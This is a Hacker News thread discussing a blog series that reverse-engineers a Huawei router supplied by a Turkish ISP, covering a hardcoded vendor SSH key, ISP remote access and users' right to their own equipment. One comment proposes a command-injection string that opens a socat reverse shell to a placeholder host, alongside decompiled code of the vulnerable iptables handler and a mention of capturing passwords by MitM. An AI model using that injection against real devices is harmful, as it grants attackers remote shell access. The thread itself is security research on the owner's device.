[HN Gopher] A detailed look at the router provided by my ISP
___________________________________________________________________
A detailed look at the router provided by my ISP

Author : paddlesteamer
Score  : 487 points
Date   : 2020-03-25 10:55 UTC (1 days ago)

(HTM) web link (0x90.psaux.io)
(TXT) w3m dump (0x90.psaux.io)

| wyclif wrote:
| I'm overseas now, and using one of these crappy ISP-provided routers. I miss my nice Linksys router back home with high-density mesh, tri-band WiFi, and four gigabit ethernet ports.
| 1_player wrote:
| Very interesting article.
|
| What about that precompiled .ssh/authorized_keys with user z00163152@HUAWEI-627FB9A3 mentioned in Part 3?
|
| Any reason why a router firmware would permit root access to anyone at all? Definitely sounds like a backdoor to me.
| skoskie wrote:
| That was the worst part. I would have that bombshell as the lede. And then delete it if possible.
| tibbydudeza wrote:
| Wow, some good detective skills at work here. Got a similar Huawei HG635 from my provider ... kept it because it supports LTE cutover.
|
| Fortunately some kind person leaked the admin password so that I could configure it to my liking.
| j_h wrote:
| EU net neutrality regulation grants end users the right to use their own equipment.
|
| https://fsfe.org/activities/routers/
| Someone1234 wrote:
| Turkey isn't in the EU.
| anticensor wrote:
| IANAL, but Turkcell would lose the case in Turkey too. This is not due to net neutrality regulations (Turkey deliberately lacks it), but due to case law arisen from competition and customer rights regulations. However, telcos work around that too, by "leasing" modems, like telephone divisions did in the past. Does the trick of "leasing" work in the EU too?
| mercora wrote:
| in marketing they try hard to make it sound like what you are going to get by renting their device is WiFi, not just the ability to turn on WiFi functionality of the CPE.
| of course everybody wants that but most people don't get that that's not something that has to be provided by the ISP. I am not sure if it's required, but i have seen often a lower end device (without WiFi accessible) is given for the lifetime of the contract free of charge.
|
| in Germany you have the right to use a compatible device you own yourself. However my ISP Vodafone does not accept lots of modems as compatible and when this regulation started there were basically none you could actually buy. It's not much better now i guess but i digress.
|
| EDIT: reading your comment again the trick you mentioned probably works because it's "yours" when you lease it instead of renting it?
| anticensor wrote:
| Not instead of renting, but of selling.
| mercora wrote:
| note there is only Germany, Italy and the Netherlands with this regulation enforced. they even link to a [0]page with progress of that campaign.
|
| [0] https://wiki.fsfe.org/Activities/CompulsoryRouters/#Router_F...
| non-entity wrote:
| A while back, I was playing around with the cable modem / router the ISP gave me because I was curious and an idiot. After screwing around a bit, I managed to find a vulnerability that exposed technician credentials in plaintext and they actually worked. Had no idea where to report it though, because the manufacturer's contact page could be summed up as _fuck you we don't talk directly to consumers_. I don't think the vulnerability was that bad, as you had to be logged in to the web interface already with another account, but still.
|
| I don't really trust ISP provided hardware / software now though.
| Bartweiss wrote:
| > _you had to be logged in to the web interface already with another account_
|
| Obviously I don't know specifics, but if this applies to any router which has multiple tiers of login then it could be a pretty serious problem.
| I suspect that might be true for routers designed specifically to broadcast multiple networks (e.g. school or shared apartment-building routers)?
| praptak wrote:
| The right thing to do in such circumstances is to publish the vulnerability.
| ProZsolt wrote:
| But how do you publish it without the liability of getting sued? A person like me who doesn't work in security still occasionally finds some vulnerability. Sometimes you get angry emails from the company even if you just try to warn them.
| jeroenhd wrote:
| If you think they'd sue, you can always send the details to a tech journalist specialized in such matters (someone with a proven track record of protecting their sources). Use an anonymous email service to be sure.
|
| If something goes wrong, they'll take the threat of legal action and probably win. Companies know that suing journalists often leads to more bad press than cooperating. They can even try to contact the company in question for you if the vulnerability is bad enough.
|
| If the company doesn't respond or get their shit together, journalists will get a scoop and the company is forced to fix their shit. If the company does fix their shit, the journalist will still get a story out of it and you can rest easy that you've helped make the internet just a little bit safer for everyone.
| saagarjha wrote:
| Publish the angry emails too.
| praptak wrote:
| Getting sued for what? Also, you can publish anonymously.
|
| Sitting on exploits forever only helps attackers and gives a false sense of security to dumb companies.
| steerablesafe wrote:
| You never know. The same technician credentials could potentially work on many routers from the same ISP, maybe even through WAN.
| mercora wrote:
| it looks like this CLI has some hardcoded shell commands with variable substitutions that look possibly unprotected against command injection.
|
| For example
|
|     iptables %s > %s 2>&1
|
| could probably be executed as
|
|     iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1
|
| by issuing
|
|     iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
|
| and therefore it might be possible to get real shell access too.
| paddlesteamer wrote:
| Hello, OP here, I've actually spent a considerable amount of time to find a code execution. I know you'll want to learn details of FUN_004122c0 but here is the decompiled version of the iptables part from ghidra:
|
|     /* Roles of the FUN_* helpers noted below are inferred from their
|        argument patterns and are not confirmed. */
|     undefined4 FUN_004045a0(int param_1,int *param_2)
|     {
|       int iVar1;
|       int iVar2;
|       char *pcVar3;
|       char cVar4;
|       code *pcVar5;
|       undefined auStack544 [256];
|       undefined auStack288 [260];
|
|       FUN_00412530(auStack544,0,0x100);   /* memset-like: zero 0x100 bytes */
|       FUN_00412530(auStack288,0,0x100);
|       if (param_1 == 0) {
|         /* no arguments: fixed command line */
|         FUN_004122c0(auStack288,0x100,"iptables > %s 2>&1","/var/IptablesInfo");
|       }
|       else {
|         iVar1 = FUN_00412210(0x100);      /* malloc-like: 0x100-byte scratch buffer */
|         if (iVar1 == 0) {
|           return 0x40010009;
|         }
|         cVar4 = '\0';
|         /* join up to 16 user-supplied arguments with spaces */
|         while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
|           if (cVar4 == '\0') {
|             FUN_004122c0(iVar1,0x100,0x412c84,iVar2);   /* snprintf-like, "%s"? */
|           }
|           else {
|             FUN_004122c0(iVar1,0x100,"%s %s",iVar1,iVar2);
|           }
|           cVar4 = cVar4 + '\x01';
|           param_2 = param_2 + 1;
|         }
|         /* joined arguments are substituted straight into the template */
|         FUN_004122c0(auStack288,0x100,"iptables %s > %s 2>&1",iVar1,"/var/IptablesInfo");
|         FUN_00412660(iVar1);              /* free-like */
|       }
|       FUN_00412330(auStack288);           /* executes the command line (shell redirection present) */
|       iVar1 = FUN_004123c0("/var/IptablesInfo",0x414f68);   /* fopen-like */
|       if (iVar1 == 0) {
|         pcVar5 = FUN_004126e0;
|         pcVar3 = "Fail\r";
|       }
|       else {
|         while (iVar2 = FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {   /* fgets-like */
|           FUN_004126b0(0x412c84,auStack544);   /* print one line */
|           FUN_004121a0(0xd);
|         }
|         FUN_00412520(DAT_0042b010);
|         FUN_004123a0(iVar1);              /* fclose-like */
|         pcVar5 = FUN_00412500;            /* probably remove()/unlink-like */
|         pcVar3 = "/var/IptablesInfo";
|       }
|       (*pcVar5)(pcVar3);
|       return 0;
|     }
|
| Any ideas?
| mercora wrote:
| i guess you already tried issuing commands like i mentioned?!
|
| i am still confused by this code but to me it looks like this has been originally written in another language but maybe this is just what it looks like after de-compiling.
|
|     FUN_004122c0(auStack288,0x100,"iptables %s > %s 2>&1",iVar1,"/var/IptablesInfo");
|
| for me it looks like FUN_004122c0 is a function of some object in auStack288 (maybe at offset 0x100?) probably passing the remaining arguments to a sprintf like function before executing it... or maybe it is a function to call instance methods in general and this happens to be the 0x100th function or something...
|
| not sure i am getting this right, i've never tried this before ^^ seeing this function would likely be more interesting
| Faaak wrote:
| Depends if they `execve` or run the command inside a shell.
|
| I'd bet for (1), but who knows.
| Hello71 wrote:
| redirections aren't parsed by exec....
| Faaak wrote:
| Indeed, I read the command's template too fast. Well, in this case it's worrisome
| Aachen wrote:
| Controlling arguments without shell often still leads to RCE though, because a lot of software has some flag that runs some command
|
| https://0x90909090.blogspot.com/2015/07/no-one-expect-comman...
| blakesterz wrote:
| Interesting read! There's actually 3 parts to this:
|
| Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-Already...
|
| And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already...
|
| Summary from the end of Part 3:
|
| "So we managed to change passwords for both ssh and telnet, gain access to Root user for the web interface, changed that password too. We changed ACS URL to ours and remove the IP restrictions. To put it simply, we cleaned up our router from our ISP. Good for our privacy."
| sheep-a wrote:
| You forgot this bit of the summary, which I think is more interesting!
|
| "Still there is an authorized ssh key left in the firmware but for now it's enough that we're keeping the ISP out.
| Maybe in the future, we can repack the firmware with our configuration and keys and install it on the router. For now, take care!"
| Craighead wrote:
| Huawei implies Chinese intelligence services left that there
| stevespang wrote:
| If you are in Turkey, Erdogan's boys are spying on EVERYONE, especially after the attempted coup. Huawei is happy to provide spying through the router to Erdogan's Boogiemen - - in fact, several of them are probably next room over from you watching your screen now . . .
| fulafel wrote:
| Trivia: Strictly speaking a box that does NAT is not a router in the IP protocol sense, it's a kind of proxy. The router requirements RFC explicitly forbids altering most fields (incl the address field) in the IP header.
| icedchai wrote:
| ...an RFC that was written in 1995, before NAT was really necessary.
|
| My view: If it forwards IP between different networks, it's a router.
| fulafel wrote:
| NAT existed in somewhat wide use in 95, PIX had come out recently. It's not necessary today either.
| icedchai wrote:
| It existed, but was definitely not in wide use. I worked for several early internet providers during that period (mid to late 90's.) Most folks had public addresses on their desktops. No customer we ever set up wanted NAT. Most didn't even have firewalls, sadly! Some of these were small companies, some of these were large corporations or universities.
|
| And I'd argue NAT actually _is_ necessary if you want IPv4 for home use. We'd be out of addresses otherwise.
| fulafel wrote:
| ISPs didn't use it in the early days, but it was used in corporate/organizational networks. The PIX was apparently marketed as a security appliance (heh) so that defined the user base to a large extent.
|
| You can access the web over v4 with other kinds of proxies besides NAT, for example application level HTTP proxies. If you want working v4 for all the protocols, NAT is out by definition anyways.
| icedchai wrote:
| Yes, I remember the PIX! Probably late 97 or 98, I set one up for a large corp. They were not using NAT previously, but HTTP and socks proxies.
| packet_nerd wrote:
| The box in people's homes colloquially known as a router actually commonly combines a lot of functions into one:
|
| * router
| * firewall
| * NAT device
| * modem
| * switch
| * access point
| * DNS resolver
| * DHCP server
|
| And probably others I'm not thinking of :-)
| fulafel wrote:
| Adding more functions to a router doesn't make it a non-router. But if it's doing NAT and not routing, then it's a different distinction. But yep it depends on the configuration.
| qubex wrote:
| I call them "terminal adapters", because I'm still stuck in the ISDN age.
| sandov wrote:
| ONT in the case of fiber. Don't know if it technically counts as a modem.
| bobbob1921 wrote:
| Media converter maybe? (Like those $100 or so fiber to ethernet converters, I say this as it's usually a modem/router plugged into the ONT's ethernet port that does isp to cpe authentication, tunneling, etc. so the ONT is just converting fiber (from isp's OLT) to ethernet for something more common to plug into)
| iso1631 wrote:
| I have a box that runs various routing protocols including OSPF and BGP, but also does NAT where it needs to. It's known as a "router"
| c0nsumer wrote:
| Very true. Yet at the same time, it does route traffic to the appropriate boxes. And the name 'router', when referring to something someone has at their house, has entered the vernacular to mean "the box at home which lets me share the internet connection across all my computers".
|
| Most folks have no idea how it works behind the scenes, which typically is a combination of NAT (IPv4), routing (IPv6), DHCP, DNS, UPnP, and more. So, it's just "the router".
| zamadatix wrote:
| The NAT RFCs came after the routing RFC and refer to NAT as a router function, not as an orthogonal function; boxes that do NAT are referred to as routers in the RFC. This is reflected in the real world where NAT is implemented as part of the routing chain, not as a separate module. Remember NAT isn't a box creating 2 sockets and ferrying data between them, it is just the translation of fields on top of normal routing functionality.
| the8472 wrote:
| > boxes that do NAT are referred to as routers in the RFC.
|
| Newer RFCs use different terms such as CPE (customer premises equipment) and AFTR (address family transition router)
| gerdesj wrote:
| RFC 1918 does allow that the internet was changing rather fast back in 1995 and accepts it probably won't be the final word: https://tools.ietf.org/html/rfc1812#section-1.3.1
| tssva wrote:
| Trivia: Strictly speaking a box that does NAT is not a kind of proxy. Proxies act as the destination end point of one connection, establish a separate connection to another endpoint and forward data between the two separate connections. A NAT device changes IP header information such as the address field and, if also doing PAT, the port field, but doesn't act as the source or destination for connections.
| mafuy wrote:
| Many people here pointed out a problem: Removing access for the ISP and/or device manufacturer means they cannot fix bugs remotely and automatically. This is bad in situations like when the Mirai malware hit.
|
| How about this?: "You can use your own device and we provide all required information, but there will be no advanced support and you have to check for bugfixes yourself monthly."
|
| ... now that I wrote it, I see the answer: There is no way to enforce this, especially not reliably.
| marcosdumay wrote:
| Ok, from the Wikipedia:
|
| > Mirai then identifies vulnerable IoT devices using a table of more than 60 common factory default usernames and passwords
|
| Taking control of the device is exactly the kind of thing that stops that attack.
| davedx wrote:
| Fantastic write up from a hacking point of view. I did wonder about this statement though:
|
| "This is very invasive and unacceptable. It may seem necessary to apply security patches published by your ISP but the user should be able to disable it whenever she wants."
|
| Legally, at least in countries where I've lived, the ISP still owns the router. This surprised me a bit when I first found out, but then I got used to the idea, but you should treat any ISP or telecom gear in your house as something that's "rented but still owned and controlled by someone else".
| yjftsjthsd-h wrote:
| And that is why I have my own router plugged into the ISP router :)
| blacksmith_tb wrote:
| True, but I think it's worth comparing it to other utilities in your home - what if your electric company could make all your lightbulbs 20% dimmer without notice? Or if your water heater was remotely administered? ISPs, like mobile telcos, like to claim they must have control over your hardware "for security" but I think the most charitable interpretation is that it's to make their customer service dept. sweat less (more nefarious possibilities exist, of course).
| CJefferson wrote:
| The difference is that non-updated routers can cause global problems. At the very least as an ISP I'd want to say you can look after updates yourself, but we will disable your access to the internet (other than to get the update from us) whenever we try to push an update to you and you reject it.
| ProZsolt wrote:
| This is why I like separate modems, so there is a clear border between you and the ISP. Sadly currently most of the providers only give you AIOs.
| Thaxll wrote:
| You're lucky to have an SSH server active, on mine I had to open the router and dump the firmware manually :/
| lxe wrote:
| > After looking into folders, I found some interesting files. I won't go through them here but I want to mention just one of them: [$ cat etc/ssh/authorized_keys]. Maybe an engineer from Huawei (I assume z00163152@HUAWEI-627FB9A3) who owns a specific DSS key, can connect all HG253s routers without needing a password, who knows?
|
| Who knows indeed?!
| AdmiralAsshat wrote:
| I never thought to nmap my own router until reading this.
|
|     PORT      STATE SERVICE
|     53/tcp    open  domain
|     80/tcp    open  http
|     631/tcp   open  ipp
|     5000/tcp  open  upnp
|     7777/tcp  open  cbt
|     20005/tcp open  btx
|
| Now begins the three-hours-and-counting rabbit hole of trying to figure out what the hell is running on ports 7777 and 20005. Or why UPNP is apparently running, despite UPNP being explicitly disabled on the Netgear router's admin page.
| manifoldgeo wrote:
| Maybe it's a remote administration port for your ISP. I have a router provided by Frontier, formerly Verizon FiOS, where port 4567 is always open and cannot be closed with a firewall rule from the router's web UI (grayed out). After some googling I found out that it's their maintenance port: https://www.speedguide.net/port.php?port=4567
|
| For a while I had my own OpenWRT router in place of the ISP one, but I think they got wise to it and blocked the MAC. I changed it to match the ISP router's MAC address, but it only worked for about 3 minutes before being blocked again.
| AdmiralAsshat wrote:
| I bought both my modem and my router, so I'd be a little incredulous if my ISP had somehow forced a port open on it.
|
| The 20005 one _may_ be some port that NetGear uses for its USB Printing, I've found some articles that mention it.
|
| It also struck me that I hit it with nmap using the LAN IP, so perhaps these are only open _within_ the network.
| I probably need to hit the external IP of the router to see what is externally open. ShieldsUP! didn't show anything unusual.[1]
|
| EDIT: Disclosure of a vulnerability regarding port 20005[2], and Netgear confirming that it does affect my router[3], but should have been fixed. I assume the "fix" was fixing the buffer overflow vulnerability, rather than closing the port altogether.
|
| [1] https://www.grc.com/x/ne.dll?bh0bkyd2
|
| [2] https://www.kb.cert.org/vuls/id/177092/
|
| [3] https://kb.netgear.com/28393/NETGEAR-Product-Vulnerability-A...
| jason0597 wrote:
| It's funny to think that if you were to report all of your findings to your local newspaper (Turkish newspaper in this case), as to how Turkish ISPs have complete access to your router or how Huawei (China) has an SSH key for your router, people would go absolutely ballistic. But for us it's just another day of expected craziness and we're tired of talking about it
| kuesji wrote:
| i don't think too many people care about this. ( yes, i live in turkey )
| Someone1234 wrote:
| > how Turkish ISPs have complete access to your router
|
| You think it is going to blow people's socks off that a router provided and controlled by an ISP is accessible by that same ISP? Huh?
|
| The Huawei SSH key is a little strange, but depressingly common for network equipment, even big names like Cisco[0].
|
| [0] https://tools.cisco.com/security/center/content/CiscoSecurit...
| Eremotherium wrote:
| > even big names like Cisco
|
| Even? By now Cisco having hardcoded credentials and glaring security fuckups is a meme.
| gumby wrote:
| > The Huawei SSH key is a little strange, but depressingly common for network equipment, even big names like Cisco...
|
| There's an understandable reason for this: the ISP's staff aren't necessarily any more competent than the ISP's customers (some are, but there are so many ISPs that I suspect they are now a small minority).
| So just as the ISP wants to be able to reset your interface devices remotely, so will Huawei and Cisco support for the ISPs themselves.
|
| I am not implying that "understandable" means "justified"
| p1esk wrote:
| Yeah, no one cares outside of hackernews.
| blaser-waffle wrote:
| Hell, I'd imagine my grandmother or other non-tech family would be glad the telephone company can pop in and fix it
| Thaxll wrote:
| If that stuff listens on the interface of your public IP, which is most likely not the case, but yes it's still scary.
| closeparen wrote:
| CPE is just part of the ISP's infrastructure that happens to be in your house. There is no need to trust it. Just put your own router in front of it.
| hazeii wrote:
| Indeed, I've had a linux box between the router and the local network since the days of dial-up (originally it _was_ the dial-up box, which made and shared the 'net connection). The only reason I've ever had to upgrade the hardware has been because the original setup only had 10MBps NICs.
| TheSpiceIsLife wrote:
| > if you were to report all of your findings to your local newspaper ... people would go absolutely ballistic.
|
| You reckon? I don't think they'd even be interested in hearing about it.
|
| Where do you live and who is your local paper that leads you to believe they'd bother writing, let alone publishing, such a story?
| kspacewalk2 wrote:
| Turkish newspapers are almost universally subservient to the autocratic government. Any free press that's still somehow around has way more consequential dictatorial abuses of power to report on, if they dare.
| 0xff00ffee wrote:
| I'm pretty sure my new CenturyLink fiber router is similar. I tried to create a PPPoE connection from my WRT1900 directly to CenturyLink using the same credentials and I couldn't connect to my internet. However, now I am motivated to create a bridge and find out why.
|
| For CenturyLink fiber I have two boxes:
|
| Box A: the exterior fiber enters this box, the tech said it was a "translator"; and the port 4 ethernet on it goes to ...
|
| Box B: the CenturyLink wireless router, which performs the PPPoE with my credentials which were somehow hardwired because no one ever told me my username/password. I'm guessing TR-069? Then port 4 on this goes to ...
|
| Box C: MY WRT1900AC, which then goes to other subnets for my cameras, lab, and office.
|
| I figured Box B was redundant, but trying to remove it has been problematic.
| tenebrisalietum wrote:
| B probably exists so they can split fiber between multiple end users or support things like phone service over the same link. Did you use the same VPI and VCI? PPPoE also sends an identifier (the "Host-Uniq" tag if I'm understanding it right) that probably has to match what your ISP is expecting or has assigned.
| Tourus wrote:
| > PPPoE with my credentials which were somehow hardwired because no one ever told me my username/password
|
| They make it very hard to use your own "Box B", but I've set this up twice now (most recently last week). Get the username and password from CenturyLink (the tech that installs the service has this, or call them). Then, google search "century link vlan 201 wan tag". The trick is you need a router that has this functionality, most basic consumer ones don't.
|
| Unfortunately, even if you follow all directions and it still doesn't work, troubleshooting is a nightmare, very little or no help from their customer support.
| 0xff00ffee wrote:
| Ah I see. My WRT1900AC doesn't have that option. I was running OpenWRT but ran into some issues and panicked back to the default firmware. Now that I have another wireless router I might dare it again.
| JackRabbitSlim wrote:
| I had CL fiber. VLAN tagging; the VLAN tagging value was so high, OpenWRT didn't support it so I was left with the useless middle box.
| Your mileage may vary.
| 0xff00ffee wrote:
| I was just about to re-install OpenWRT, but I guess I won't now.
| 0xff00ffee wrote:
| Why did port 8015 show up on the remote system after resetting firmware? Shouldn't nmap have reported that?
| usmannk wrote:
| It was a "fast nmap", so only the top 100 most common ports were checked.
| 0xff00ffee wrote:
| Ah, thanks. If nmap was run exhaustively on all 64k ports, would that both (a) take forever, and (b) raise alarm bells on the target? Why isn't a full scan the norm?
| zeroflow wrote:
| ...and that's why my ISP's router is running in modem mode with a non-ISP-controlled router from Ubiquiti behind it - which I may replace with a pfSense box in the future.
|
| I'm pretty happy that my cable ISP is allowing this mode so I don't have to double-NAT in my setup.
| matheusmoreira wrote:
| You're lucky your ISP's router offers you that option. My ISP's VDSL2 router would require "unlocking" in order to get bridge mode and it can't be easily replaced.
| pwg wrote:
| This is why, in my case, the ISP's router (that awful box Verizon provides with FIOS) is sitting, beside the DMARC, unplugged and powered off.
|
| My DMARC has a hot ethernet jack, and _my_ firewall (PC running Linux) that I control is connected to that ethernet jack. No ISP shenanigans (other than what they can remotely do to configure the FIOS DMARC itself).
| awelkie wrote:
| If your ISP didn't have that feature, could you just replace the cable modem too? My ISP's router is running EuroDOCSIS 3.0 and I'm wondering if I could replace the router with a modem + router of my own.
| zeroflow wrote:
| Sadly I could not, since the ISP is defining the router as the endpoint of its network so there is no freedom to choose different models.
| em-bee wrote:
| practically though what is the difference between having the endpoint in a shaft by the elevator or in your apartment or even down the street?
| in all scenarios i'd put my own router behind the ISP equipment and run my local network however i want.
|
| the only issue is with getting a public ip address for inbound connections.
|
| here we are not getting public ip addresses anyways, so the point is moot for me. but if you do get one, then all they need to do is configure their router to forward the public ip to yours.
|
| in my case the ISP even installed two routers. one was theirs that i had no access to and one was "ours" that i was able to configure as i liked or replace with my own. both routers had their own wifi, but i don't use the one from the ISP endpoint router
| mercora wrote:
| if you happened to live in Germany there is a law in place that forces ISPs to allow that. But if you would live in Germany you would probably know about this. That said there is no technical reason making it impossible. If you connect an unknown device here, you get access to the customer web panel only and can register your device using it. Afterwards it gets provisioned as usual (with caveats [no PacketCable for example])
| pmlnr wrote:
| Yes, you could, but the new router+modem needs to be "accepted" by the DOCSIS provisioning. Talk to the support about it.
| skoskie wrote:
| I have been so disappointed with my ubiquiti hardware. That UI is gorgeous, but lacks some real functionality that I need. I can't block BitTorrent (see forums). And I can't see a detailed traffic log; only the categories. Plus, those pretty graphs that tell you how much data you've used don't give a time frame. I have no idea if it's a week or a month.
|
| I think pfSense will be my next too.
| bonestamp2 wrote:
| I recently upgraded my internet speed and my pfSense box was limiting my top download speed. So, I just went from pfSense to a Ubiquiti Secure Gateway.
| There are pros and cons of each, but I couldn't find any trustworthy pfSense hardware with the performance of a USG for anywhere near the same price. I do miss the configurability of pfSense though so I might switch back some day. That said, the ubiquiti interface and provisioning model is really slick.
| chrisweekly wrote:
| I'd be grateful for guidance, eg a link to a writeup of recommended hardware and config for a reasonably technical audience, eg "Given a Verizon FIOS G1100, put it in bridge mode and connect hw that supports software X"...
| mercora wrote:
| most of the time you only require PPPoE or DHCP as you practically speaking get an ethernet tunnel to your ISP using that bridge. Some ISPs additionally segment this network by VLANs so your list of required features is probably already complete here.
| hestefisk wrote:
| My ISP (Internode) provides a 'modem' for my NBN hybrid coax / fibre connection. I just put my OPNSense router in front of it and it's all secure. They provided me with all the config settings, which are a bit more obscure than usual (PPPoE but on a specific vlan tag). Works like a charm and I don't have to worry about weird government wiretapping or backdoors. My ISP provides an IPv6 range too, which is pretty cool.
| miki123211 wrote:
| Apparently a Polish carrier called Multimedia has recently introduced a new, revolutionary service for some customers. It's called "set up a custom wi-fi configuration", and it's just 5 PLN (a little over $1)! It lets you think up an SSID and password, and configure your router to use those! That's an amazing invention, isn't it? /s
|
| Some customers apparently have absolutely no access to their routers, not even to the web interface, and they can't use their own either. All reconfiguration must be done through the customer service portal or by phone. That means the carrier can charge for every little thing, including changing the Wi-Fi config!
| I'm not sure if you can even bridge, but I guess not. Note that this does not affect all customers of that carrier, just a minority.
| gbrown wrote:
| Couldn't you just daisy chain a second router via Ethernet and use it? Bonus points for VPN-ing all of your traffic.
| the8472 wrote:
| Daisy-chaining routers can severely degrade some services (gaming, p2p) due to NAT. Assuming the ISP-provided one supports PCP or UPnP-IGD you need a client on your own router that relays port forwarding configuration to the upstream router. This is possible but may need non-trivial setup.
| pathseeker wrote:
| PCP that allows ingress connections without an established egress connection is rarely enabled. The same applies to UPnP because of the baddies.
|
| https://en.wikipedia.org/wiki/Port_Control_Protocol#Security
| ege_erdogan wrote:
| I am using the exact same router from the same ISP. I was wondering what the problem was when I wasn't able to forward port 22 to my computer for an SSH connection.
|
| I had thought it had something to do with the ISP allocating the same static IP to multiple clients and blocking some common ports to prevent collisions (ended up using port 109.. something for SSH). Turns out it was more interesting!
| gumby wrote:
| I clicked through to the two follow ups -- this is both excellent sleuthery and a wonderful write up.
| sloshnmosh wrote:
| I very much enjoyed this! I bookmarked your site and hope to read more of your posts in the future.
| jscholes wrote:
| Enjoyed this write-up, but most of the exploration seemed to be facilitated by someone having already leaked the CLI root password online. Anyone have suggestions on how you might otherwise obtain that information?
| paddlesteamer wrote:
| Hi, OP here, actually it's not true. Think of the scenario as this: you don't have the CLI root password, you just do a MitM attack and learn about the root password when your ISP attempts to change it.
| This applies to my situation; also, I could learn about the default password just by looking into the firmware.
| LeonM wrote:
| In the Netherlands we now have a law where ISPs must allow your own choice of network equipment. This means they must give you the required information on how to connect your own device with their network.
|
| I have a fiber connection, which I connected directly to a Ubiquiti router through a suitable SFP module. My ISP supplied the information on the fiber type and which VLAN IDs to set up for internet, TV and telephony.
|
| This way I have my own equipment, that I control myself. The 'modem' [0] which my ISP supplied is still in its original, unopened box.
| lima wrote:
| Same in Germany! ISPs hate it because it makes their lives a lot harder - in cable networks, they now have to deal with a zoo of endpoints on a shared medium vs. a small set of standardized devices.
|
| As a customer, I like it.
| metters wrote:
| They also hate it, because they cannot charge rent, like for the ISP owned router.
| pas wrote:
| Can't they still just provide you with a "modem" and give you full IP access through that? What difference does it make if they put the modem inside or outside your premises? (E.g. they put a switch/DSLAM/modem into a box on the street and then they give you a cable?)
| pdonis wrote:
| _> ISPs hate it because it makes their lives a lot harder - in cable networks, they now have to deal with a zoo of endpoints on a shared medium vs. a small set of standardized devices._
|
| In other words, ISPs hate it because it forces them to actually do their jobs and be ISPs. The Internet itself is "a zoo of endpoints on a shared medium", and ISP stands for _Internet_ Service Provider.
| josephmosby wrote:
| It's not the provision of Internet that's the problem, it's the customer service requests.
|
| e.g., AT&T could provide perfect service to the home endpoint, but the customer bought some aftermarket router from their cousin, who had configured it for Verizon. Customer calls AT&T to holler. Tier 1 support doesn't know what that particular router config GUI even looks like, so it gets bumped to T2 or T3. Ultimately to find out that the customer's cousin had hardcoded DNS to some internal Verizon system that's not visible to AT&T.
|
| Repeat x100K. ISPs' job isn't just "provide the Internet," it's also "provide all the troubleshooting for every non-technical customer who just wants to watch Netflix but doesn't even know what a router is"
| ClumsyPilot wrote:
| Well, my understanding is that once you have your own router, it's up to you to ensure it's configured correctly.
| pdonis wrote:
| Exactly. I have my own router (and cable modem, for that matter), and I don't call Comcast when one of them breaks; I fix it myself, since I own them.
| kitteh wrote:
| Problem is you'll eventually reach a point where the problem is deep and requires them to escalate, and if you aren't checking the box of tested customer CPE they'll stop. Example of this is when I found a Comcast backbone link with an incorrect/inconsistent MTU setting. Had to go back channel in the end to someone on the ibone team, but I had no chance in hell of getting that fixed promptly via regular support.
| pdonis wrote:
| _> you'll eventually reach a point where the problem is deep and requires them to escalate, and if you aren't checking the box of tested customer CPE they'll stop_
|
| I've been a Comcast customer for more than 20 years (in two different states) and have never encountered a problem like this, so I expect such problems are extremely rare.
| Every issue I've had has been of the kind where Comcast's support person can see right away that there's a problem on their end because they can't even see my cable modem's status even though I confirm to them that it's powered up and the cable is connected (and of course I have to go through the dance of rebooting it multiple times before they'll be satisfied). Most of the time they put me on hold for a while and then come back and the problem is fixed (I assume because some tech in the background rebooted or reset something that was borked). Once they had to send a tech to my house and it turned out there was a bad connection in the junction box they had installed outside.
| matheusmoreira wrote:
| > provide all the troubleshooting for every non-technical customer who just wants to watch Netflix but doesn't even know what a router is
|
| People who don't even know what a router is don't buy their own equipment. Those who buy better routers don't require support for them; they call when there's a problem between the ISP and the router.
| pdonis wrote:
| _> ISPs' job isn't just "provide the Internet," it's also "provide all the troubleshooting for every non-technical customer who just wants to watch Netflix but doesn't even know what a router is"_
|
| No ISP that I'm aware of will provide troubleshooting for devices they don't own. They just say "sorry, not our device, not our problem". When I installed my own cable modem and router, Comcast was quite clear about that. And I said "fine, no problem".
| jmiserez wrote:
| My ISP does, but they're the exception to the rule and cater to techies. Of course support questions for random devices need to be more specific than just "it doesn't work".
| pdonis wrote:
| _> My ISP does_
|
| Out of curiosity, which ISP do you have?
| jmiserez wrote:
| init7.net.
| They have a bunch of official guides, but also help with other devices and have debugged issues with new devices. Basically if your device is capable they want to make it work.
| thallian wrote:
| Init7 is great, I only had to tick a checkbox saying something like "I know what I am doing" and apart from providing the technical information they left me alone. Only had one problem with them that they resolved very quickly (the fiber cable got damaged somewhere in the basement).
| kitteh wrote:
| +1 to init7. They've gone above and beyond when I needed them to change their routing policies to improve end to end latency to a specific destination. Good luck getting that from a major US carrier. And I wasn't even a customer.
| iagovar wrote:
| The ISP I work for does, and it's a very large one (not in the US). If a router is not ours, we check for sync or if PPPoE is up. We tell the customer what's the result of our tests and offer a technician if they are willing to pay in case it's not our fault.
|
| Most people are unwilling to pay, and yell at customer service. Most of the time, especially when the router has sync, it's the customer's fault.
| the8472 wrote:
| > we check for sync or if PPPoE is up.
|
| The problem with this kind of procedure is that it's only a reasonable way to locate the problem when there are problems at that very moment. You're getting stonewalled when - during the day - you're reporting that it frequently loses sync during the night.
| CameronNemo wrote:
| I work at an ISP of sorts. It is a regional research and education network. We are owned by our members. Heterogeneity is definitely par for the course, but that does not stop us from trying to roll out some ubiquity where we can. Many of our CPE routers are the same make and model, and that makes maintenance and analysis much less error prone. I.e. better service for our member institutions.
|
| If you want an ISP whose competitive advantage is dealing with whatever crazy shit the edge throws at it, then that is your prerogative. But having some ground rules and baseline behavior makes it so that the ISP can focus on more rewarding tasks, such as negotiating peerings, establishing direct tunnels, improving network observability, and predicting necessary backbone upgrades.
| pdonis wrote:
| _> having some ground rules and baseline behavior_
|
| Doesn't "if you choose to use your own cable modem/router, it must meet the DOCSIS 3 specification" do this? That's the rule Comcast made me follow.
| saber6 wrote:
| To bolster your point: Honestly they don't need to do much - the infrastructure is already there as a matter of being able to turn people's service up/down/on/off.
|
| There is always a provider-managed CPE device that functions as the service demarcation point. This is the point where your contracted service speed is enforced (shape + egress queue and ingress policing).
|
| You can have literally whatever router (dumb, smart, next-gen, whatever) spewing bits at X rate. The CPE will essentially normalize (police) that bit rate to your contracted speed (upstream scenario).
